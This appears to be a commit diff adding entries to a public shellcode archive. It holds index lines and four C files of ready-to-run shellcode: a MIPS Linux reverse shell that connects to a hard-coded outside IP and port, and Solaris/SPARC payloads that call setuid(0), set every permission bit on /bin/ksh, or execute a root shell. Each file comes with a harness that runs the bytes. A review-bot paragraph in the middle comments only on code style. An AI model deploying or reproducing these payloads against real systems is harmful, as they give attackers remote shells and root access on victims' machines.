50722,shellcodes/windows_x86/50722.asm,"Windows/x86 - Locate kernel32 base address / Stack Crack method NullFree Shellcode (171 bytes)",1970-01-01,"Tarek Ahmed",shellcode,windows_x86
50748,shellcodes/solaris_sparc/50748.c,"Solaris/SPARC - setuid(0) + chmod (/bin/ksh) + exit(0) Shellcode",1970-01-01,"Marco Ivaldi",shellcode,solaris_sparc
50749,shellcodes/solaris_sparc/50749.c,"Solaris/SPARC - chmod(./me) Shellcode",1970-01-01,"Marco Ivaldi",shellcode,solaris_sparc
50750,shellcodes/solaris_sparc/50750.c,"Solaris/SPARC - setuid(0) + execve (/bin/ksh) Shellcode",1970-01-01,"Marco Ivaldi",shellcode,solaris_sparc
50751,shellcodes/linux_mips/50751.c,"Linux/MIPS - N32 MSB Reverse Shell Shellcode",1970-01-01,"Marco Ivaldi",shellcode,linux_mips

1 id file description date author type platform
1046 50710 shellcodes/windows_x86/50710.asm Windows/x86 - Download File and Execute / Dynamic PEB & EDT method Shellcode (458 bytes) 1970-01-01 Techryptic shellcode windows_x86
1047 50711 shellcodes/windows_x86/50711.asm Windows/x86 - Locate kernel32 base address / Memory Sieve method Shellcode (133 bytes) 1970-01-01 Tarek Ahmed shellcode windows_x86
1048 50722 shellcodes/windows_x86/50722.asm Windows/x86 - Locate kernel32 base address / Stack Crack method NullFree Shellcode (171 bytes) 1970-01-01 Tarek Ahmed shellcode windows_x86
1049 50748 shellcodes/solaris_sparc/50748.c Solaris/SPARC - setuid(0) + chmod (/bin/ksh) + exit(0) Shellcode 1970-01-01 Marco Ivaldi shellcode solaris_sparc
1050 50749 shellcodes/solaris_sparc/50749.c Solaris/SPARC - chmod(./me) Shellcode 1970-01-01 Marco Ivaldi shellcode solaris_sparc
1051 50750 shellcodes/solaris_sparc/50750.c Solaris/SPARC - setuid(0) + execve (/bin/ksh) Shellcode 1970-01-01 Marco Ivaldi shellcode solaris_sparc
1052 50751 shellcodes/linux_mips/50751.c Linux/MIPS - N32 MSB Reverse Shell Shellcode 1970-01-01 Marco Ivaldi shellcode linux_mips


@ -0,0 +1,90 @@
/*
* mips_n32_msb_linux_revsh.c - MIPS N32 MSB Linux reverse
* Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Basic MIPS N32 MSB Linux reverse shellcode, showcasing various
* techniques to avoid badchars.
*
* Cross-compile (https://buildroot.org/) with:
* $ mips64-linux-gcc -static mips_n32_msb_linux_revsh.c -o revsh
*
* Tested on Linux MIPS64 Cavium Octeon III. I placed the shellcode on the
* stack, because on my test device the .data section was not executable.
*
* Based on https://youtu.be/0-_Wtz5L9ZY by Evan Walls at tacnetsol.com.
*/
void main()
{
char sc[] =
// sub technique
"\x24\x0d\xff\xfa" // li $t1, -6
"\x01\xa0\x68\x27" // nor $t1, $zero # 5
// sock = socket(2, 2, 0)
"\x25\xa4\xff\xfd" // addiu $a0, $t1, -3 # 2
"\x25\xa5\xff\xfd" // addiu $a1, $t1, -3 # 2
"\x25\xa6\xff\xfb" // addiu $a2, $t1, -5 # 0
"\x24\x02\x17\x98" // li $v0, 0x1798 # socket (0x1798)
"\x01\x01\x01\x0c" // syscall 0x40404
"\x24\x50\x10\x10" // addiu $s0, $v0, 0x1010 # sock + 0x1010
// xor technique
"\x24\x0e\x21\x21" // li $t2, 0x2121
// connect(sock, {2, 0x5ac2, 0x5db8d822}, 16)
"\x26\x04\xef\xf0" // addiu $a0, $s0, -0x1010 # sock
"\x39\xcc\x21\x23" // xori $t0, $t2, 0x2123 # 2
"\xa7\xac\xff\xec" // sh $t0, -20($sp)
"\x24\x0c\x5a\xc2" // li $t0, 0x5ac2 # 23234 << XXX port
"\xa7\xac\xff\xee" // sh $t0, -18($sp)
"\x24\x0c\x5d\xb8" // li $t0, 0x5db8 # 93.184 << XXX ip1
"\xa7\xac\xff\xf0" // sh $t0, -16($sp)
"\x34\x0c\xd8\x22" // li $t0, 0xd822 # 216.34 << XXX ip2
"\xa7\xac\xff\xf2" // sh $t0, -14($sp)
"\x27\xa5\xff\xec" // addiu $a1, $sp, -20
"\x39\xc6\x21\x31" // xori $a2, $t2, 0x2131 # 16
"\x24\x02\x17\x99" // li $v0, 0x1799 # connect (0x1799)
"\x01\x01\x01\x0c" // .byte 0x01, 0x01, 0x01, 0x0c # syscall
// add overflow technique
"\x24\x0f\x7f\x7f" // li $t3, 0x7f7f
// dup2(sock, 0)
"\x26\x04\xef\xf0" // addiu $a0, $s0, -0x1010 # sock
"\x25\xe5\x80\x81" // addiu $a1, $t3, 0x8081 # 0
"\x24\x02\x17\x90" // dup2 (0x1790)
"\x01\x01\x01\x0c" // syscall 0x40404
// dup2(sock, 1)
"\x26\x04\xef\xf0" // addiu $a0, $s0, -0x1010 # sock
"\x25\xe5\x80\x82" // addiu $a1, $t3, 0x8082 # 1
"\x24\x02\x17\x90" // dup2 (0x1790)
"\x01\x01\x01\x0c" // syscall 0x40404
// dup2(sock, 2)
"\x26\x04\xef\xf0" // addiu $a0, $s0, -0x1010 # sock
"\x25\xe5\x80\x83" // addiu $a1, $t3, 0x8083 # 2
"\x24\x02\x17\x90" // dup2 (0x1790)
"\x01\x01\x01\x0c" // syscall 0x40404
// execve("/bin/sh", ["/bin/sh"], 0)
"\x3c\x0c\x2f\x62" // lui $t0, 0x2f62 # "/b"
"\x25\x8c\x69\x6e" // addiu $t0, 0x696e # "in"
"\xaf\xac\xff\xec" // sw $t0, -20($sp)
"\x3c\x0c\x2f\x73" // lui $t0, 0x2f73 # "/s"
"\x25\x8c\x68\x68" // addiu $t0, 0x6868 # "hh"
"\xaf\xac\xff\xf0" // sw $t0, -16($sp)
"\xa3\xa0\xff\xf3" // sb $zero, -13($sp) # NUL
"\x27\xa4\xff\xec" // addiu $a0, $sp, -20
"\xaf\xa4\xff\xf8" // sw $a0, -8($sp)
"\xaf\xa0\xff\xfc" // sw $zero, -4($sp)
"\x27\xa5\xff\xf8" // addiu $a1, $sp, -8
"\x28\x06\xff\xff" // slti $a2, $zero, -1 # 0 (slti technique)
"\x24\x02\x17\xa9" // li $v0, 0x17a9 # execve (0x17a9)
"\x01\x01\x01\x0c"; // syscall 0x40404
void (*f)() = (void *)sc;
f();
}
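Review bot: `void main()` is not a conforming signature for a hosted program; the harness should read `int main(void)` and end with `return 0;`, and the same applies to the three Solaris/SPARC files in this commit. The header says the shellcode was placed on the stack because `.data` was not executable on the author's device, but the `void (*f)() = (void *)sc; f();` call then assumes the stack is executable, which the comment establishes only for that device; state the assumption explicitly, e.g. `// assumes an executable stack — true on the test device, verify elsewhere`. The per-instruction comments are inconsistent: the three dup2 blocks annotate `"\x24\x02\x17\x90"` as `dup2 (0x1790)` without the `li $v0, 0x1790` mnemonic the socket/connect/execve lines carry, and the connect syscall line is described as `.byte ...` where every other syscall line says `syscall 0x40404`.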


@ -0,0 +1,38 @@
/*
* sparc_solaris_chmod.c - Solaris/SPARC chmod() shellcode
* Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Solaris/SPARC setuid/chmod/exit shellcode.
*
* Tested on:
* SunOS 5.10 Generic_Virtual sun4u sparc SUNW,SPARC-Enterprise
*/
char sc[] = /* Solaris/SPARC chmod() shellcode (12 + 32 + 20 = 64 bytes) */
/* setuid(0) */
"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
"\x82\x10\x20\x17" /* mov 0x17, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
/* chmod("/bin/ksh", 037777777777) */
"\x92\x20\x20\x01" /* sub %g0, 1, %o1 */
"\x20\xbf\xff\xff" /* bn,a <sc + 12> */
"\x20\xbf\xff\xff" /* bn,a <sc + 16> */
"\x7f\xff\xff\xff" /* call <sc + 20> */
"\x90\x03\xe0\x20" /* add %o7, 0x20, %o0 */
"\xc0\x22\x20\x08" /* clr [ %o0 + 8 ] */
"\x82\x10\x20\x0f" /* mov 0xf, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
/* exit(0) */
"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
"\x82\x10\x20\x01" /* mov 1, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh";
void main()
{
void (*f)() = (void *)sc;
f();
}


@ -0,0 +1,29 @@
/*
* sparc_solaris_chmod2.c - Solaris/SPARC chmod() shellcode
* Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Very small Solaris/SPARC chmod shellcode. See also:
* http://phrack.org/issues/70/13.html#article
*
* Tested on:
* SunOS 5.10 Generic_Virtual sun4u sparc SUNW,SPARC-Enterprise
*/
char sc[] = /* Solaris/SPARC chmod() shellcode (max size is 36 bytes) */
/* chmod("./me", 037777777777) */
"\x92\x20\x20\x01" /* sub %g0, 1, %o1 */
"\x20\xbf\xff\xff" /* bn,a <sc> */
"\x20\xbf\xff\xff" /* bn,a <sc + 4> */
"\x7f\xff\xff\xff" /* call <sc + 8> */
"\x90\x03\xe0\x14" /* add %o7, 0x14, %o0 */
"\xc0\x22\x20\x04" /* clr [ %o0 + 4 ] */
"\x82\x10\x20\x0f" /* mov 0xf, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"./me";
void main()
{
void (*f)() = (void *)sc;
f();
}


@ -0,0 +1,35 @@
/*
* sparc_solaris_exec.c - Solaris/SPARC execve() shellcode
* Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Pretty standard Solaris/SPARC setuid/execve shellcode.
*
* Tested on:
* SunOS 5.10 Generic_Virtual sun4u sparc SUNW,SPARC-Enterprise
*/
char sc[] = /* Solaris/SPARC execve() shellcode (12 + 48 = 60 bytes) */
/* setuid(0) */
"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
"\x82\x10\x20\x17" /* mov 0x17, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
/* execve("/bin/ksh", argv, NULL) */
"\x9f\x41\x40\x01" /* rd %pc,%o7 ! >= sparcv8+ */
"\x90\x03\xe0\x28" /* add %o7, 0x28, %o0 */
"\x92\x02\x20\x10" /* add %o0, 0x10, %o1 */
"\xc0\x22\x20\x08" /* clr [ %o0 + 8 ] */
"\xd0\x22\x20\x10" /* st %o0, [ %o0 + 0x10 ] */
"\xc0\x22\x20\x14" /* clr [ %o0 + 0x14 ] */
"\x82\x10\x20\x0b" /* mov 0xb, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\x80\x1c\x40\x11" /* xor %l1, %l1, %g0 ! nop */
"\x41\x41\x41\x41" /* placeholder */
"/bin/ksh";
void main()
{
void (*f)() = (void *)sc;
f();
}